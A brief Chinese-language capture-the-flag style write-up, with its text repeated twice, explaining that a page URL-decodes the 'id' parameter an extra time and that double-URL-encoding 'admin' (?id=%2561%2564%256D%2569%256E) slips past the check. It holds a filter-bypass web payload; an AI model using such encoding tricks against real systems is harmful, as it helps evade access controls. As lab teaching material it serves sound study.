使用目录扫描工具
这就是内容,可以发现对提交的参数,get获取后进行了一次url编码,
而id值在传的过程中本身就是会被urldecode编码一次。所以进行两次编码?id=admin
对admin进行两次url编码,提交即可
?id=%2561%2564%256D%2569%256E
使用目录扫描工具
这就是内容,可以发现对提交的参数,get获取后进行了一次url编码,
而id值在传的过程中本身就是会被urldecode编码一次。所以进行两次编码?id=admin
对admin进行两次url编码,提交即可
?id=%2561%2564%256D%2569%256E